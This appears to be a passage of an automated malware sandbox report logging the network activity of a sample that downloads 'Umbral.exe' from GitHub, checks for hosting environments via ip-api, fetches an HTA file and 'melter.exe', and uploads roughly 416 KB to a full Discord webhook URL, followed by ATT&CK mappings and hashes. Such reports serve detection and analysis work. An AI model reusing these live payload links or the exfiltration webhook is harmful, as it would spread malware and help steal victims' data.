accept-ranges: bytes
content-range: bytes 7625-18493/235008
date: Fri, 09 Aug 2024 10:51:05 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1723200666.837599,VS0,VE1
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 60933f38e3ef2c9bc9a41aea58099cc491219361
expires: Fri, 09 Aug 2024 10:56:05 GMT
source-age: 7
content-length: 10869
-
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
Remote address: 185.199.111.133:443
Request
GET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
range: bytes=18494-34811
user-agent: Microsoft BITS/7.8
Response
HTTP/2.0 206
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
accept-ranges: bytes
content-range: bytes 18494-34811/235008
date: Fri, 09 Aug 2024 10:51:06 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1723200667.908691,VS0,VE1
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: bb0f0c39820d6f3db40e3152530434dc645c2600
expires: Fri, 09 Aug 2024 10:56:06 GMT
source-age: 8
content-length: 16318
-
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
Remote address: 185.199.111.133:443
Request
GET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
range: bytes=34812-75005
user-agent: Microsoft BITS/7.8
Response
HTTP/2.0 206
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
accept-ranges: bytes
content-range: bytes 34812-75005/235008
date: Fri, 09 Aug 2024 10:51:07 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1723200668.997773,VS0,VE1
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 454225dbcc8de102730e0cac5a345e13b706ddbb
expires: Fri, 09 Aug 2024 10:56:07 GMT
source-age: 9
content-length: 40194
-
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
Remote address: 185.199.111.133:443
Request
GET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
range: bytes=75006-162434
user-agent: Microsoft BITS/7.8
Response
HTTP/2.0 206
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
accept-ranges: bytes
content-range: bytes 75006-162434/235008
date: Fri, 09 Aug 2024 10:51:09 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1723200669.056551,VS0,VE1
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: 06965168cba95e3277f055f5029258babdfa3af5
expires: Fri, 09 Aug 2024 10:56:09 GMT
source-age: 10
content-length: 87429
-
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe
Remote address: 185.199.111.133:443
Request
GET /chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exe HTTP/2.0
host: raw.githubusercontent.com
accept: */*
accept-encoding: identity
range: bytes=162435-235007
user-agent: Microsoft BITS/7.8
Response
HTTP/2.0 206
content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
content-type: application/octet-stream
etag: "2b1b86c8a318d755b515b93a2e2d7253f8d6547ce18a5f5655a64e44de74fb32"
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
x-frame-options: deny
x-xss-protection: 1; mode=block
x-github-request-id: 407C:27E46E:207B41:2891F4:66B5F492
accept-ranges: bytes
content-range: bytes 162435-235007/235008
date: Fri, 09 Aug 2024 10:51:10 GMT
via: 1.1 varnish
x-served-by: cache-lcy-eglc8600086-LCY
x-cache: HIT
x-cache-hits: 0
x-timer: S1723200670.129366,VS0,VE1
vary: Authorization,Accept-Encoding,Origin
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
x-fastly-request-id: f8b497915177d7c159dcfd192c9d6d71ce56961b
expires: Fri, 09 Aug 2024 10:56:10 GMT
source-age: 12
content-length: 72573
-
Remote address:8.8.8.8:53Request215.156.26.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request133.111.199.185.in-addr.arpaIN PTRResponse133.111.199.185.in-addr.arpaIN PTRcdn-185-199-111-133githubcom
-
Remote address:8.8.8.8:53Requestgstatic.comIN AResponsegstatic.comIN A172.217.23.195
-
Remote address:172.217.23.195:443RequestGET /generate_204 HTTP/1.1
Host: gstatic.com
Connection: Keep-Alive
ResponseHTTP/1.1 204 No Content
Cross-Origin-Resource-Policy: cross-origin
Date: Fri, 09 Aug 2024 10:51:10 GMT
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:8.8.8.8:53Request195.23.217.172.in-addr.arpaIN PTRResponse195.23.217.172.in-addr.arpaIN PTRams16s37-in-f31e100net195.23.217.172.in-addr.arpaIN PTRprg03s05-in-f3195.23.217.172.in-addr.arpaIN PTRprg03s05-in-f195
-
Remote address:8.8.8.8:53Requestimage.noelshack.comIN AResponseimage.noelshack.comIN A35.227.215.6
-
Remote address:35.227.215.6:443RequestGET /fichiers/2021/14/5/1617997407-risitas.jpg HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: image.noelshack.com
ResponseHTTP/1.1 404 Not Found
x-request-id: 4WMdrYc20w2IdsbHoW5eS
x-cloud-trace-context: 2c7a0b963c1d2970f29e866e05d9f5c4
date: Fri, 09 Aug 2024 10:51:11 GMT
server: Google Frontend
Content-Length: 27
via: 1.1 google
X-cdn-cache-status: miss
X-cdn-cache-id: LHR-1bd33b0f
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
-
Remote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
Remote address:208.95.112.1:80RequestGET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
Remote address:8.8.8.8:53Requestddl8.data.huIN AResponseddl8.data.huIN CNAMEstore8.data.hustore8.data.huIN A217.65.97.73store8.data.huIN A217.65.97.74store8.data.huIN A217.65.97.75
-
Remote address:217.65.97.73:443RequestGET /get/387805/13078039/risitas.hta HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ddl8.data.hu
ResponseHTTP/1.1 200 OK
Date: Fri, 09 Aug 2024 10:51:11 GMT
Content-Type: application/octet-stream
Content-Length: 511
Last-Modified: Wed, 13 Jul 2022 17:17:58 GMT
Connection: keep-alive
Content-Disposition: attachment; filename=risitas.hta
ETag: "62cefe46-1ff"
Accept-Ranges: bytes
-
Remote address:217.65.97.73:443RequestGET /get/339969/12880996/melter.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: ddl8.data.hu
ResponseHTTP/1.1 200 OK
Date: Fri, 09 Aug 2024 10:51:12 GMT
Content-Type: application/octet-stream
Content-Length: 3072
Last-Modified: Fri, 09 Apr 2021 19:31:07 GMT
Connection: keep-alive
Content-Disposition: attachment; filename=melter.exe
ETag: "6070ab7b-c00"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Request6.215.227.35.in-addr.arpaIN PTRResponse6.215.227.35.in-addr.arpaIN PTR621522735bcgoogleusercontentcom
-
Remote address:8.8.8.8:53Request1.112.95.208.in-addr.arpaIN PTRResponse1.112.95.208.in-addr.arpaIN PTRip-apicom
-
Remote address:8.8.8.8:53Request73.97.65.217.in-addr.arpaIN PTRResponse73.97.65.217.in-addr.arpaIN PTRs73ip4lp01wwdhhu
-
Remote address:208.95.112.1:80RequestGET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
ResponseHTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 161
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
Remote address:8.8.8.8:53Requestdiscord.comIN AResponsediscord.comIN A162.159.135.232discord.comIN A162.159.138.232discord.comIN A162.159.137.232discord.comIN A162.159.136.232discord.comIN A162.159.128.233
-
POSThttps://discord.com/api/webhooks/1271130161290412125/Uac1_oA6juqVZotENjx7aiH2Nr2GQ1ha4DzcN2guDXzR8vOvxawI_8Ag2vRi94iSNupMUmbral.exeRemote address:162.159.135.232:443RequestPOST /api/webhooks/1271130161290412125/Uac1_oA6juqVZotENjx7aiH2Nr2GQ1ha4DzcN2guDXzR8vOvxawI_8Ag2vRi94iSNupM HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 940
Expect: 100-continue
Connection: Keep-Alive
ResponseHTTP/1.1 204 No Content
Content-Type: text/html; charset=utf-8
Connection: keep-alive
set-cookie: __dcfduid=4d07554a563d11efb90c4a6d507782d5; Expires=Wed, 08-Aug-2029 10:51:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1723200677
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L2rroAk0ZM1m1TAlJbQ8c7SZ%2B8gJr2X0XCtjn%2FgGk39svlc3qtL%2FnKS2nWuoVQjyuogTHKPfDAgvDz5EvH0fo64aJjCVOyfkV4cuA6ItecMsyH1mx2rRNOXL8G7E"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=4d07554a563d11efb90c4a6d507782d51124c81bee95db3e1598f8a4cf54e5b731224616948c4c38aff769c014a78749; Expires=Wed, 08-Aug-2029 10:51:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=fa8f18397ddb6d39f8f356202efeda452dc10d82-1723200675; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=ZEm5f8xgWU2eZMwPcbrGzvSSm0KswNZDUNuzaCZDfwU-1723200675754-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8b07309e3ca660e1-LHR
-
POSThttps://discord.com/api/webhooks/1271130161290412125/Uac1_oA6juqVZotENjx7aiH2Nr2GQ1ha4DzcN2guDXzR8vOvxawI_8Ag2vRi94iSNupMUmbral.exeRemote address:162.159.135.232:443RequestPOST /api/webhooks/1271130161290412125/Uac1_oA6juqVZotENjx7aiH2Nr2GQ1ha4DzcN2guDXzR8vOvxawI_8Ag2vRi94iSNupM HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: multipart/form-data; boundary="1f1a6053-ad92-4ac9-ae80-d0f93fd03932"
Host: discord.com
Cookie: __dcfduid=4d07554a563d11efb90c4a6d507782d5; __sdcfduid=4d07554a563d11efb90c4a6d507782d51124c81bee95db3e1598f8a4cf54e5b731224616948c4c38aff769c014a78749; __cfruid=fa8f18397ddb6d39f8f356202efeda452dc10d82-1723200675; _cfuvid=ZEm5f8xgWU2eZMwPcbrGzvSSm0KswNZDUNuzaCZDfwU-1723200675754-0.0.1.1-604800000
Content-Length: 416187
Expect: 100-continue
ResponseHTTP/1.1 200 OK
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1723200677
x-ratelimit-reset-after: 1
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9%2Fneyx%2B07L263gAl7j9ocn0YA4yXVdNznG2KrBZRd50u0trgPYYDbeGp88lUQvUeROa1BtzYwME5DJQ9BhJuOPt9DCSHm%2FUw88mOM5nxl0bARAk6aRdymAaIRSl1"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Server: cloudflare
CF-RAY: 8b07309fadde60e1-LHR
-
Remote address:8.8.8.8:53Request232.135.159.162.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request50.23.12.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request15.164.165.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request147.142.123.92.in-addr.arpaIN PTRResponse147.142.123.92.in-addr.arpaIN PTRa92-123-142-147deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request25.140.123.92.in-addr.arpaIN PTRResponse25.140.123.92.in-addr.arpaIN PTRa92-123-140-25deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestcdn.discordapp.comIN AResponsecdn.discordapp.comIN A162.159.129.233cdn.discordapp.comIN A162.159.134.233cdn.discordapp.comIN A162.159.130.233cdn.discordapp.comIN A162.159.133.233cdn.discordapp.comIN A162.159.135.233
-
GEThttps://cdn.discordapp.com/attachments/1270748828064026688/1270795908333830224/lachancla.mp3?ex=66b5006a&is=66b3aeea&hm=fef184cfee046c915c36e2e19d9c14527d9ef7b161801e1d097fc6bd48263b26WScript.exeRemote address:162.159.129.233:443RequestGET /attachments/1270748828064026688/1270795908333830224/lachancla.mp3?ex=66b5006a&is=66b3aeea&hm=fef184cfee046c915c36e2e19d9c14527d9ef7b161801e1d097fc6bd48263b26 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
Accept-Language: en-US
Range: bytes=0-
User-Agent: NSPlayer/12.00.19041.1288 WMFSDK/12.00.19041.1288
GetContentFeatures.DLNA.ORG: 1
Host: cdn.discordapp.com
ResponseHTTP/1.1 404 Not Found
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=EW_xRWgNGVCBbFAGunmPMYBwYxEOU4OHKP6UHhAHqvI-1723200745-1.0.1.1-TGSVDv2E14TVBAymJstK5Wi4f493JpEweYiQaqgKDFfD0JWuv.iR2T7jwtdE3hbE97u0P3dbnCChX1jGrh6YcA; path=/; expires=Fri, 09-Aug-24 11:22:25 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zarCttHBtWQ7%2F%2Fs91714vpKcaewe092XUOTh5Qe6ku0Say3wEb8xNaXTbcG0FakKK38PveSapnxwIATeWf9dAgQTSdkc4IhNexZyL2WsgvdMTqzSbBD0fLNl%2F5UyV6pYGigkqA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=TJz0.l8AGyEFkVeMuLwGyacUx1CpWs_gzUNS2piz8.4-1723200745858-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8b0732558e2b653e-LHR
alt-svc: h3=":443"; ma=86400
-
GEThttps://cdn.discordapp.com/attachments/1270748828064026688/1270795908333830224/lachancla.mp3?ex=66b5006a&is=66b3aeea&hm=fef184cfee046c915c36e2e19d9c14527d9ef7b161801e1d097fc6bd48263b26WScript.exeRemote address:162.159.129.233:443RequestGET /attachments/1270748828064026688/1270795908333830224/lachancla.mp3?ex=66b5006a&is=66b3aeea&hm=fef184cfee046c915c36e2e19d9c14527d9ef7b161801e1d097fc6bd48263b26 HTTP/1.1
Accept: */*
User-Agent: NSPlayer/12.0.19041.1288 WMFSDK/12.0
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: cdn.discordapp.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Content-Type: text/plain;charset=UTF-8
Content-Length: 36
Connection: keep-alive
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=3XDfw.HIPTwUXyjT7l2lvvwpa1G436UnmtDbgG4OJw0-1723200746-1.0.1.1-Re2roGSMQU1CmBZLrz7CSzWZvkndjPuiXJTL23Ekidwc8ac0FI3r6PzwIdZb88zUYJbhaF0ZV5jsqSvSAAJEWg; path=/; expires=Fri, 09-Aug-24 11:22:26 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JTW2hA%2FEaefJU7Lk9EcpkwQy7O3BcCZhNOK%2B0k4po%2BDBKGye4dqquk4eyhft%2F4sIzFYw3upDE73wb7fDozYj87ooARorCM0kb9SMonkhfLjts9DuB1JmIP9NNUYHl3iRJyE4Nw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Set-Cookie: _cfuvid=Fh1wJSJPicmuwOtswgm1y4SYo30YCfYCGASiOX8Wthk-1723200746269-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8b0732580b9648c8-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Request19.229.111.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request233.129.159.162.in-addr.arpaIN PTRResponse
-
20.26.156.215:443https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exetls, http22.7kB 39.0kB 38 39
HTTP Request
HEAD https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302HTTP Request
GET https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302HTTP Request
GET https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302HTTP Request
GET https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302HTTP Request
GET https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302HTTP Request
GET https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302HTTP Request
GET https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302HTTP Request
GET https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302HTTP Request
GET https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exeHTTP Response
302 -
185.199.111.133:443https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exetls, http26.2kB 251.4kB 114 207
HTTP Request
HEAD https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
200HTTP Request
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
206HTTP Request
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
206HTTP Request
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
206HTTP Request
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
206HTTP Request
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
206HTTP Request
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
206HTTP Request
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
206HTTP Request
GET https://raw.githubusercontent.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/main/Umbral.exeHTTP Response
206 -
724 B 4.9kB 8 8
HTTP Request
GET https://gstatic.com/generate_204HTTP Response
204 -
35.227.215.6:443https://image.noelshack.com/fichiers/2021/14/5/1617997407-risitas.jpgtls, httpWScript.exe904 B 5.6kB 9 10
HTTP Request
GET https://image.noelshack.com/fichiers/2021/14/5/1617997407-risitas.jpgHTTP Response
404 -
310 B 267 B 5 2
HTTP Request
GET http://ip-api.com/line/?fields=hostingHTTP Response
200 -
1.6kB 13.4kB 15 16
HTTP Request
GET https://ddl8.data.hu/get/387805/13078039/risitas.htaHTTP Response
200HTTP Request
GET https://ddl8.data.hu/get/339969/12880996/melter.exeHTTP Response
200 -
285 B 510 B 5 4
HTTP Request
GET http://ip-api.com/json/?fields=225545HTTP Response
200 -
162.159.135.232:443https://discord.com/api/webhooks/1271130161290412125/Uac1_oA6juqVZotENjx7aiH2Nr2GQ1ha4DzcN2guDXzR8vOvxawI_8Ag2vRi94iSNupMtls, httpUmbral.exe467.9kB 13.6kB 357 166
HTTP Request
POST https://discord.com/api/webhooks/1271130161290412125/Uac1_oA6juqVZotENjx7aiH2Nr2GQ1ha4DzcN2guDXzR8vOvxawI_8Ag2vRi94iSNupMHTTP Response
204HTTP Request
POST https://discord.com/api/webhooks/1271130161290412125/Uac1_oA6juqVZotENjx7aiH2Nr2GQ1ha4DzcN2guDXzR8vOvxawI_8Ag2vRi94iSNupMHTTP Response
200 -
162.159.129.233:443https://cdn.discordapp.com/attachments/1270748828064026688/1270795908333830224/lachancla.mp3?ex=66b5006a&is=66b3aeea&hm=fef184cfee046c915c36e2e19d9c14527d9ef7b161801e1d097fc6bd48263b26tls, httpWScript.exe1.0kB 4.5kB 7 7
HTTP Request
GET https://cdn.discordapp.com/attachments/1270748828064026688/1270795908333830224/lachancla.mp3?ex=66b5006a&is=66b3aeea&hm=fef184cfee046c915c36e2e19d9c14527d9ef7b161801e1d097fc6bd48263b26HTTP Response
404 -
162.159.129.233:443https://cdn.discordapp.com/attachments/1270748828064026688/1270795908333830224/lachancla.mp3?ex=66b5006a&is=66b3aeea&hm=fef184cfee046c915c36e2e19d9c14527d9ef7b161801e1d097fc6bd48263b26tls, httpWScript.exe998 B 4.5kB 8 7
HTTP Request
GET https://cdn.discordapp.com/attachments/1270748828064026688/1270795908333830224/lachancla.mp3?ex=66b5006a&is=66b3aeea&hm=fef184cfee046c915c36e2e19d9c14527d9ef7b161801e1d097fc6bd48263b26HTTP Response
404
MITRE ATT&CK Enterprise v15
Defense Evasion
BITS Jobs: 1
File and Directory Permissions Modification: 1
Hide Artifacts: 1
Hidden Files and Directories: 1
Modify Registry: 1
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_F44A8781B6F141CBB1A818B233ABAF07.dat
Filesize: 940B
MD5: aa4aef9dcdb83f7f08580d9ccd5d410f
SHA1: d0bed89b0ff3521e035ebf79977f1ae5d29a7c68
SHA256: fe139d82df83d3ea407623680770288e711392b386e45f86070d68f6781c258f
SHA512: 79eef6d39961e85129fa84610023319de4d665c9636264f53c50e61b174c1fc4a477f06b250b071bbfd9d1939e61a4cfa74fc5c25328ffaa5009c283966b7ce0